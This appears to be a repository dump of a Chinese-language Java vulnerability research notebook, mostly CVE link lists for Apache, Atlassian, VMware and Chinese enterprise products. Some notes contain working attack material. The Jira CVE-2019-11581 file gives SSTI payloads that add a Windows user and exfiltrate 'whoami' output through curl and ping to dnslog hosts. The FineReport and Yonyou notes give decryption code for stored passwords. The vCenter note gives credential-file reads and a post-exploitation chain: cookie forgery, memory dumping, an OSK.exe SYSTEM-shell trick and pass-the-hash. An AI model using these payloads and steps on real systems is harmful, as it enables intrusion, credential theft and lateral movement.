--------------------------------------------------------------------------------
/application/apache/felix atomos/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | ---
3 |
4 | ### GHSL-2022-007 Path Traversal
5 |
6 | - https://securitylab.github.com/advisories/GHSL-2022-007_Apache_Felix_Atomos/
7 |
--------------------------------------------------------------------------------
/application/apache/james server/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | ---
3 |
4 | ### CVE-2022-22931 Path Traversal
5 |
6 | - https://securitylab.github.com/advisories/GHSL-2022-002_GHSL-2022-003_Apache_James_Server/
7 |
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110115454715.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110115454715.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110122150681.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110122150681.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110131939248.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110131939248.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110132101561.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110132101561.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110132402813.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110132402813.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110132647092.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110132647092.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110132939245.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110132939245.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110133028087.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110133028087.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110142929486.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110142929486.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110143652926.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110143652926.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110143822970.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110143822970.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110150226665.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110150226665.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110151507777.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110151507777.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110151828365.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110151828365.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110153629595.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110153629595.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110154139526.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110154139526.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110155144536.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110155144536.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110155734110.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110155734110.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110155805314.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110155805314.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110161543541.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110161543541.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110161704602.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110161704602.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110161955992.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110161955992.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110171302346.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110171302346.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110171735060.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110171735060.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110172050167.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110172050167.png
--------------------------------------------------------------------------------
/application/apache/jspwiki/jspwiki.assets/image-20220110172151844.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/apache/jspwiki/jspwiki.assets/image-20220110172151844.png
--------------------------------------------------------------------------------
/application/apache/karaf/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | ---
3 |
4 | ### CVE-2022-22932 Path Traversal
5 |
6 | - https://securitylab.github.com/advisories/GHSL-2022-005_006_Apache_Karaf/
7 |
--------------------------------------------------------------------------------
/application/apache/kylin/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | ---
3 |
4 | ### CVE-2021-45456 Command injection
5 |
6 | - https://securitylab.github.com/advisories/GHSL-2021-1048_GHSL-2021-1051_Apache_Kylin/
7 |
8 | ### CVE-2021-45458 Hardcoded credentials
9 |
10 | - https://securitylab.github.com/advisories/GHSL-2021-1048_GHSL-2021-1051_Apache_Kylin/
11 |
--------------------------------------------------------------------------------
/application/apache/olingo/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | ---
3 |
4 | ### CVE-2020-1925 SSRF
5 |
6 | - https://blog.gypsyengineer.com/en/security/cve-2020-1925-ssrf-in-apache-olingo.html
7 |
8 | ### CVE-2019-17556 Unsafe deserialization
9 |
10 | - https://blog.gypsyengineer.com/en/security/cve-2019-17556-unsafe-deserialization-in-apache-olingo.html
11 |
12 |
13 | ### CVE-2019-17555 DoS
14 |
15 | - https://blog.gypsyengineer.com/en/security/cve-2019-17555-dos-via-retry-after-header-in-apache-olingo.html
16 |
17 |
18 |
--------------------------------------------------------------------------------
/application/apache/pinot/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | ---
3 |
4 | ### GHSL-2022-004 Path Traversal
5 |
6 | - https://securitylab.github.com/advisories/GHSL-2022-004_Apache_Pinot/
7 |
--------------------------------------------------------------------------------
/application/apache/poi/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | ---
3 |
4 | ### CVE-2019-12415 XXE
5 |
6 | - https://blog.gypsyengineer.com/en/security/cve-2019-12415-xml-processing-vulnerability-in-apache-poi.html
7 |
--------------------------------------------------------------------------------
/application/apache/solr/README.md:
--------------------------------------------------------------------------------
1 | 前置基础
2 | ---
3 |
4 | 相关漏洞
5 | ---
6 |
7 |
8 | 研究利用
9 | ---
10 |
11 | https://github.com/veracode-research/solr-injection
12 |
--------------------------------------------------------------------------------
/application/apache/storm/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | ---
3 |
4 | ### CVE-2021-40865 Unsafe Deserialization
5 |
6 | - https://securitylab.github.com/advisories/GHSL-2021-086-apache-storm/
7 |
8 | ### CVE-2021-38294 Command injection
9 |
10 | - https://securitylab.github.com/advisories/GHSL-2021-085-apache-storm/
11 |
--------------------------------------------------------------------------------
/application/atlassian/bitbucket/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 |
3 | - [ ] CVE-2019-3397 Path Travel -> RCE
4 |
5 |
6 |
--------------------------------------------------------------------------------
/application/atlassian/confluence/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 |
3 | - [x] [CVE-2022-26134 OGNL -> RCE](https://pen4uin.github.io/post/22-10-03-confluence-el-injection-via-ognl/)
4 | - [ ] CVE-2021-26084 OGNL -> RCE
5 | - [ ] CVE-2019-3396 Velocity SSTi=I -> RCE/File Read
6 | - [x] [CVE-2020-4027 SSTI -> RCE](https://pen4uin.github.io/post/22-10-01-confluence-ssti-via-velocity/)
--------------------------------------------------------------------------------
/application/atlassian/crowd/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 |
3 | - [ ] CVE-2019-11580 RCE
--------------------------------------------------------------------------------
/application/atlassian/jira/CVE-2019-11581.md:
--------------------------------------------------------------------------------
1 | #### 漏洞描述
2 |
3 | 影响版本
4 | ```
5 | 4.4.x
6 | 5.x.x
7 | 6.x.x
8 | 7.0.x、7.1.x、7.2.x、7.3.x、7.4.x、7.5.x、7.6.x before 7.6.14 (the fixed version for 7.6.x)、7.7.x、7.8.x、7.9.x、7.10.x、7.11.x、7.12.x、7.13.x before 7.13.5 (the fixed version for 7.13.x)
9 | 8.0.x before 8.0.3 (the fixed version for 8.0.x)、8.1.x before 8.1.2 (the fixed version for 8.1.x)、8.2.x before 8.2.3 (the fixed version for 8.2.x)
10 | ```
11 |
12 | ### 漏洞复现
13 |
14 | #### 漏洞验证
15 |
16 | 漏洞利用
17 |
18 | > https://github.com/jas502n/CVE-2019-11581
19 |
20 | 确认未登陆状态下漏洞的存在
21 |
22 | 访问如下URL(无需管理员账户权限):
23 |
24 | http://10.10.10.12:8080/secure/ContactAdministrators!default.jspa
25 |
26 | 
27 |
28 | 在Subject填入payload
29 |
30 | 针对不同目标操作系统的验证
31 |
32 | - Windows
33 | - Linux
34 |
35 | ##### Windows 利用
36 |
37 | 添加用户
38 |
39 | ```
40 | $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('net user neo 1qaz@WSX3edc /add').waitFor()
41 | ```
42 |
43 | ##### Linux 利用
44 |
45 | 登陆管理员账号,然后访问如下URL:
46 |
47 | /secure/admin/SendBulkMail!default.jspa
48 |
49 | ```
50 | # dnslog query
51 | $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://uz09sm.dnslog.cn').waitFor()
52 |
53 | # dnslog 外带命令执行结果 示例:whoami
54 | $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('ping `whoami`.vniyj2.dnslog.cn').waitFor()
55 | ```
56 |
57 | dnslog query
58 |
59 | 
60 |
61 |
--------------------------------------------------------------------------------
/application/atlassian/jira/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | - [x] [CVE-2019-11581 SSTI -> RCE](CVE-2019-11581.md)
--------------------------------------------------------------------------------
/application/atlassian/jira/img/image-20210919113350954-16322839765956.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/atlassian/jira/img/image-20210919113350954-16322839765956.png
--------------------------------------------------------------------------------
/application/atlassian/jira/img/image-20210919120024420.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/atlassian/jira/img/image-20210919120024420.png
--------------------------------------------------------------------------------
/application/cisco/asdm/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 |
3 | - [ ] CVE-2021-1585 RCE
4 |
5 |
--------------------------------------------------------------------------------
/application/cisco/hyperflex hx/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 |
3 | - [ ] CVE-2021-1497 Command Injection
4 | - [ ] CVE-2021-1498 Command Injection
5 | - [ ] CVE-2021-1499 File Upload
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/application/citrix/xenmobile/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 |
3 | - [ ] CVE-2021-44228 Path Traversal
4 | - [x] [CVE-2020-8209 Path Traversal](https://mp.weixin.qq.com/s/tZXp1zTlfas7makYcgZusw)
--------------------------------------------------------------------------------
/application/f5/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 |
3 | - [ ] CVE-2020-5902 RCE
4 |
5 |
--------------------------------------------------------------------------------
/application/fanruan/README.md:
--------------------------------------------------------------------------------
1 | 历史漏洞
2 |
3 | - [ ] CNVD-2021-34467 v9 文件上传
--------------------------------------------------------------------------------
/application/fanruan/code/X-FineReport.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/fanruan/code/X-FineReport.jar
--------------------------------------------------------------------------------
/application/fanruan/code/X-FineReport.java:
--------------------------------------------------------------------------------
1 | package code;
2 |
3 | public class FineReport {
4 | private static final int[] PASSWORD_MASK_ARRAY = new int[]{19, 78, 10, 15, 100, 213, 43, 23};
5 | public static String passwordEncode(String paramString) {
6 | final StringBuilder sb = new StringBuilder();
7 | sb.append("___");
8 | int n = 0;
9 | for (int i = 0; i < paramString.length(); ++i) {
10 | if (n == PASSWORD_MASK_ARRAY.length) {
11 | n = 0;
12 | }
13 | String s2 = Integer.toHexString(paramString.charAt(i) ^ PASSWORD_MASK_ARRAY[n]);
14 | for (int length = s2.length(), j = 0; j < 4 - length; ++j) {
15 | s2 = "0" + s2;
16 | }
17 | sb.append(s2);
18 | ++n;
19 | }
20 | return sb.toString();
21 | }
22 |
23 | private static String passwordDecode(String paramString) {
24 | if (paramString != null && paramString.startsWith("___")) {
25 | paramString = paramString.substring(3);
26 | StringBuilder sb = new StringBuilder();
27 | int i = 0;
28 | for (int j = 0; j <= paramString.length() - 4; j += 4) {
29 | if (i == PASSWORD_MASK_ARRAY.length) {
30 | i = 0;
31 | }
32 | String str = paramString.substring(j, j + 4);
33 | int k = Integer.parseInt(str, 16) ^ PASSWORD_MASK_ARRAY[i];
34 | sb.append((char) k);
35 | ++i;
36 | }
37 | paramString = sb.toString();
38 | }
39 | return paramString;
40 | }
41 |
42 | public static void main(String[] args) {
43 | if (args.length < 2) {
44 | System.out.println("Usage:");
45 | System.out.println("FineReportX.jar --encode admin");
46 | System.out.println("FineReportX.jar --decode ___0072002a00670066000a00e400190024");
47 | } else {
48 | if ("--encode".equals(args[0])) {
49 | String pass = passwordEncode(args[1]);
50 | System.out.println(pass);
51 | } else if ("--decode".equals(args[0])) {
52 | String pass = passwordDecode(args[1]);
53 | System.out.println(pass);
54 | }
55 | }
56 | }
57 | }
58 |
--------------------------------------------------------------------------------
/application/fanruan/code/fineReport-decrypt.py:
--------------------------------------------------------------------------------
1 | cipher = input("输入密文:\n") # 密文
2 | PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23]
3 | password = ""
4 | cipher = cipher[3:]
5 | for i in range(int(len(cipher) / 4)):
6 | c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
7 | c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
8 | password = password + chr(c2)
9 | print("明文密码:\n"+password)
10 |
--------------------------------------------------------------------------------
/application/fanruan/利用研究.md:
--------------------------------------------------------------------------------
1 |
2 | ### 密码解密
3 |
4 | > python
5 |
6 | 密码配置文件
7 | ```
8 | \WEB-INF\resources\privilege.xml
9 | ```
10 | 获取加密后的密文
11 |
12 | 
13 |
14 | 反编译jar包获取加密代码逻辑
15 |
16 | 
17 |
18 |
19 | 解密脚本
20 | 
21 |
22 |
23 | > java
24 |
25 | - 获取加解密逻辑姿势同上
26 |
27 | ```shell
28 | java -jar .\X-code.FineReport.jar --encode pen4uin
29 | java -jar .\X-code.FineReport.jar --decode ___0063002b0064003b001100bc0045
30 | ```
31 |
32 | 
33 |
--------------------------------------------------------------------------------
/application/h3c/利用研究.md:
--------------------------------------------------------------------------------
1 | 利用研究
2 | ---
3 |
4 | - [IMC数据库解密 from t00ls](https://www.t00ls.com/articles-66252.html)
5 |
--------------------------------------------------------------------------------
/application/ibm/README.md:
--------------------------------------------------------------------------------
1 | 历史漏洞
2 |
3 | - [ ] CVE-2020-4280 反序列化
4 |
5 |
6 |
--------------------------------------------------------------------------------
/application/landray/README.md:
--------------------------------------------------------------------------------
1 | 历史漏洞
2 |
3 | - pre-auth SSRF/FileRead - custom.jsp
4 | - post-auth SQLi - kmImeetingRes.do
5 | - post-auth XMLDecoderDeserialization - sysSearchMain.do
6 | - post-auth RCE = getBean() + bsh.Interpreter - dataxml.jsp
7 | - post-auth JDBC RCE - admin.do
--------------------------------------------------------------------------------
/application/landray/利用研究.md:
--------------------------------------------------------------------------------
1 | 利用研究
2 | ---
3 |
4 | ### 配置文件解密 - admin.properties
5 |
6 | 文件位置
7 | > ekp/WEB-INF/KmssConfig/admin.properties
8 |
9 | 解密工具
10 | - https://github.com/zhutougg/LandrayDES
11 |
12 |
13 |
14 | ### 配置文件解密 - kmssconfig.properties
15 | 文件位置
16 |
17 | > ekp/WEB-INF/KmssConfig/kmssconfig.properties
18 |
19 | example
20 |
21 | 
22 |
23 |
24 | 解密代码实现
25 |
26 | ```java
27 | package org.example;
28 |
29 | import java.io.*;
30 | import java.nio.file.Files;
31 | import java.nio.file.Paths;
32 | import com.landray.kmss.sys.config.action.SysConfigAdminUtil;
33 |
34 | public class SysConfigDecrypt {
35 | public static void main(String[] args) throws Exception {
36 | InputStream in = Files.newInputStream(Paths.get("H:\\landray\\ekp\\WEB-INF\\KmssConfig\\kmssconfig.properties"));
37 | InputStreamReader inr = new InputStreamReader(SysConfigAdminUtil.doPropertiesDecrypt(in));
38 | BufferedReader br = new BufferedReader(inr);
39 | String line;
40 | StringBuilder sb = new StringBuilder();
41 | while((line = br.readLine()) != null){
42 | sb.append(line).append("\r\n");
43 | }
44 | System.out.println(sb);
45 | }
46 | }
47 | ```
48 |
49 |
50 | 解密效果如图
51 |
52 | 
53 |
54 |
--------------------------------------------------------------------------------
/application/mcafee/README.md:
--------------------------------------------------------------------------------
1 | 历史漏洞
2 |
3 | - [ ] ZipSlip -> RCE
4 |
5 |
--------------------------------------------------------------------------------
/application/oracle/access manager/README.md:
--------------------------------------------------------------------------------
1 | 历史漏洞
2 |
3 | - [] CVE-2021-35587 RCE
4 |
--------------------------------------------------------------------------------
/application/vmware/vcenter/README.md:
--------------------------------------------------------------------------------
1 | 历史漏洞
2 |
3 | - [x] CVE-2022-31680 VMware vCenter PSC 反序列化
4 | - [ ] CVE-2021-44228 VMware Product RCE via Log4Shell
5 | - [ ] CVE-2021-22017 VMware vCenter rhttpproxy Bypass
6 | - [ ] CVE-2021-22005 VMware vCenter 文件上传
7 | - [ ] CVE-2021-21985 VMware vCenter 远程代码执行
8 | - [ ] CVE-2021-21973 VMware vCenter SSRF -> /sdk
9 | - [ ] CVE-2021-21972 VMware vCenter 远程命令执行
10 | - [ ] CVE-2021-00000 VMware vCenter 文件读取 -> /eam/vib?id=
11 | - [ ] CVE-2021-00000 VMware vCenter SSRF/文件读取 -> /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=
12 |
--------------------------------------------------------------------------------
/application/vmware/vcenter/利用研究.md:
--------------------------------------------------------------------------------
1 | 基础信息
2 | ---
3 |
4 | #### 获取版本号
5 | version_detect.xml
6 | ```xml
7 |
8 |
9 |
10 | <_this type="ServiceInstance">ServiceInstance
11 |
12 |
13 |
14 | ```
15 |
16 | Curl One Liner
17 | ```shell
18 | type version_detect.xml | curl -X POST -k -H 'Content-type:text/xml' -d @- https://10.10.100.100/sdk
19 | ```
20 |
21 | 
22 |
23 | #### 数据库配置文件
24 | ```shell
25 | find -name vcdb.properties
26 | cat /etc/vmware-vpx/vcdb.properties
27 | # cat /etc/vmware/service-state/vpxd/vcdb.properties
28 | ```
29 | 
30 |
31 |
32 | #### 利用研究
33 |
34 | 攻击路径
35 | ---
36 | - CVE-2021-44228(root) -> CVE-2020-3952 -> gain Administrative access
37 | - CVE-2021-22005(root) -> CVE-2020-3952 -> gain Administrative access
38 | - CVE-2021-21985(no root) -> CVE-2021-3156/CVE-2021-4034(root) -> CVE-2020-3952 -> gain Administrative access
39 | - CVE-2021-21972(no root) -> CVE-2021-3156/CVE-2021-4034(root) -> CVE-2020-3952 -> gain Administrative access
40 |
41 | ### CVE-2021-22005(root) -> CVE-2020-3952 -> gain Administrative access
42 | > 实战案例
43 |
44 | CVE-2021-22005获取初始webshell权限
45 |
46 | CVE-2020-3952提取IdP证书、伪造管理员cookie获取后台权限
47 | - 工具地址
48 | - [vcenter_saml_login](https://github.com/horizon3ai/vcenter_saml_login)
49 |
50 | data.mdb位置:
51 | - Linux:
52 |
53 | ```
54 | /storage/db/vmware-vmdir/data.mdb
55 | ```
56 | - Windows
57 |
58 | ```
59 | C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb
60 | ```
61 |
62 | 
63 |
64 | 访问https://10.10.10.1/ui,在 /ui 路径下替换上一步所获得的cookie
65 |
66 | 
67 |
68 |
69 | 扩大战果
70 | - 可通过vcenter的快照功能获取虚拟机的快照,然后通过内存取证的姿势dump凭证,pth;
71 | - 也可将快照传到本地,再恢复成虚拟机,然后通过PE,重命名CMD.EXE为OSK.exe覆盖原OSK.exe,此时开机打开屏幕键盘会弹出SYSTEM权限的命令行窗口,本地上线cs然后hashdump抓取凭证,pth即可。(by banliz1)
72 |
--------------------------------------------------------------------------------
/application/vmware/workspace one access/README.md:
--------------------------------------------------------------------------------
1 | 历史漏洞
2 |
3 | - [ ] CVE-2022-22954 SSTI -> pre-auth RCE
4 | - [ ] CVE-2021-22056 SSRF
5 | - [ ] CVE-2020-4006 Comand Injection
6 |
7 |
--------------------------------------------------------------------------------
/application/weaver/ecology/利用研究.md:
--------------------------------------------------------------------------------
1 | ### 0x01 默认账号密码
2 | ```
3 | sysadmin/1
4 | ```
5 | 对应数据库的
6 | - 表名:`HrmResourceManager`
7 | - 字段:`password`
8 |
9 | ### 0x02 XStream 反序列化漏洞
10 |
11 | 需要考虑的实战场景:
12 | - XStream的不出网利用
13 | - CVE-2021-39149 TemplatesImpl
14 | - CVE-2021-21350 BCEL
15 | - 回显 & 内存马
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/application/yonyou/code/ncDatabase.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/application/yonyou/code/ncDatabase.jar
--------------------------------------------------------------------------------
/application/yonyou/利用研究.md:
--------------------------------------------------------------------------------
1 | 利用研究
2 | ---
3 |
4 | ### 数据库密码解密
5 |
6 | 数据库配置文件位置
7 |
8 | > /ierp/bin/prop.xml
9 |
10 | example
11 |
12 | ```
13 |
14 | nc
15 | C2
16 | jdbc:sqlserver://127.0.0.1:1433;database=nc;sendStringParametersAsUnicode=false
17 | nc
18 | jlehfdffcfmohiag
19 | com.microsoft.sqlserver.jdbc.SQLServerDriver
20 | SQLSERVER
21 | 50
22 | 10
23 | nc.bs.mw.ejb.xares.IerpDataSource
24 | nc.bs.mw.ejb.xares.IerpXADataSource
25 | 0
26 | 0
27 | 0
28 |
29 | ```
30 |
31 | 效果如图:
32 |
33 | 
34 |
35 |
36 |
37 |
--------------------------------------------------------------------------------
/component/batik/README.md:
--------------------------------------------------------------------------------
1 | - https://xmlgraphics.apache.org/batik/
2 |
3 | > actually can lead to rce
4 |
5 |
6 | 
7 |
8 |
--------------------------------------------------------------------------------
/component/commons-jxpath/README.md:
--------------------------------------------------------------------------------
1 | > CVE-2022-41852
2 | - [Extension_Functions](https://commons.apache.org/proper/ç/users-guide.html#Extension_Functions)
3 |
4 | ```
5 | Using the standard extension functions, you can call methods on objects, static methods on classes
6 | and create objects using any constructors. All class names should be fully qualified.
7 | ```
8 |
9 | 
10 |
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/component/hutool/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | ---
3 |
4 | ### CVE-2018-17297 ZipSlip
5 |
6 | - [Hutool任意文件覆盖漏洞分析](https://www.sqyysec.com/Hutool%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%A6%86%E7%9B%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/)
7 |
--------------------------------------------------------------------------------
/component/urlrewritefilter/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | #### [Arbitrary resource file download in urlrewrite.xml](https://jira.atlassian.com/browse/CONFSERVER-26888)
4 |
5 | **Description**
6 |
7 | There is an arbitrary resource file download vulnerability triggered by a third party library org.tuckey.web.filters.urlrewrite.UrlRewriteFilter.
8 |
9 | The urlrewrite.xml rules file shows the pattern that will trigger a forward rule, which is the equivelant of performing dp = request.getServletContext().getRequestDispatcher(resource); dp.forward(request, response);. This construct allows a user to forward requests to any resource file on the server, such as /WEB-INF/web.xml - which could potentially contain sensitive information like usernames and passwords.
10 |
11 | web.xml
12 | ```xml
13 |
14 |
15 | UrlRewriteFilter
16 | org.tuckey.web.filters.urlrewrite.UrlRewriteFilter
17 |
18 | ```
19 | urlrewrite.xml
20 | ```xml
21 | ...
22 |
23 | ^/s/(.*)/_/([^\?]*).*
24 |
25 | /$2
26 |
27 |
28 | ```
29 |
30 | The attached screenshot shows this issue being exploited.
31 |
32 | 
33 |
34 | #### CVE-2021-26085 & CVE-2021-26086
35 |
36 | - https://hackerone.com/reports/1369288
37 | - https://xz.aliyun.com/t/10109
38 | - https://tttang.com/archive/1323/
39 |
40 | #### CVE-2022–31656
41 |
42 | - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd
43 |
--------------------------------------------------------------------------------
/development/javassist/README.md:
--------------------------------------------------------------------------------
1 |
2 | https://www.javassist.org/tutorial/tutorial.html
3 |
4 | 解决需求:
5 |
6 | 根据已有模板动态创建 class,可以修改部分需要自定义的字段值
7 |
8 | 应用场景:
9 |
10 | 由内存马模板文件动态生成自定义密码/密钥/请求头等的 class
11 |
12 | ---
13 |
14 | 问题记录
15 |
16 | 01 javassist.NotFoundException
17 | - https://blog.csdn.net/paincupid/article/details/51175244
18 |
--------------------------------------------------------------------------------
/framework/log/log4j1/CVE-2019-17571.md:
--------------------------------------------------------------------------------
1 | **漏洞分析**
2 |
3 | SimpleSocketServer若开启了xxxx端口,会对socket接收的数据进行反序列化操作
4 |
5 | 
6 |
7 | 测试效果
8 |
9 | 
10 |
11 | **漏洞验证**
12 |
13 | 
14 |
15 |
--------------------------------------------------------------------------------
/framework/log/log4j1/CVE-2022-23307.md:
--------------------------------------------------------------------------------
1 | **漏洞分析**
2 |
3 | 设置监听端口
4 |
5 | 
6 |
7 | 然后使用 LoggingReceiver 处理相关连接信息,反序列化ois对象时触发漏洞
8 |
9 | 
10 |
11 |
12 | **漏洞验证**
13 |
14 | 
15 |
--------------------------------------------------------------------------------
/framework/log/log4j1/README.md:
--------------------------------------------------------------------------------
1 | 历史漏洞
2 |
